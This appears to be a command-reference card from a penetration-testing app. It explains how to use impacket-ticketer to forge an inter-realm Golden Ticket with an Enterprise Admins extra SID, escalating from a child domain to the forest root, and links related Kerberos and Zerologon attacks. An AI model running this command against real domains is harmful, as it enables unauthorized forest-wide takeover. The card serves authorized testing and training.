Inter-Realm Golden Ticket
Forge a cross-domain Golden Ticket to escalate from child to parent domain
- Tool
- impacket-ticketer
- Category
- Privilege Escalation / Trust Attacks
- Platform
- linux
- Requires
- NTLM hash
- Protocols
- KERBEROS
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
impacket-ticketer -nthash '<trust_hash>' -domain-sid '<domain_sid>' -domain '<domain>' -extra-sid '<target_domain_sid>-519' -spn 'krbtgt/<target_domain>' '<user>'
Examples
impacket-ticketer -nthash 'aad3b435b51404eeaad3b435b51404ee' -domain-sid 'S-1-5-21-111111111-111111111-111111111' -domain 'child.corp.local' -extra-sid 'S-1-5-21-222222222-222222222-222222222-519' -spn 'krbtgt/corp.local' 'administrator'
Tags
Related commands
- Impacket PSExec Execute commands via PSExec service
- Impacket goldenPac (MS14-068) Exploit MS14-068 Kerberos privilege escalation to obtain Domain Admin via forged PAC
- Impacket LookupSID Enumerate domain SIDs and discover trust relationships via SID brute-forcing
- Impacket raiseChild Escalate from child domain DA to forest root DA via inter-realm Kerberos trust
- LDAPSearch Shadow Principals (PAM Trust) Enumerate msDS-ShadowPrincipal objects to identify PAM trust shadow principals
- NetExec LDAP Raise Child Escalate from child domain DA to forest root DA via inter-realm Kerberos trust abuse
- NetExec SMB NoPAC Check for and exploit the NoPAC (CVE-2021-42278/42287) Kerberos privilege escalation…
- NetExec SMB Zerologon Check for Zerologon (CVE-2020-1472) vulnerability — resets DC computer account password…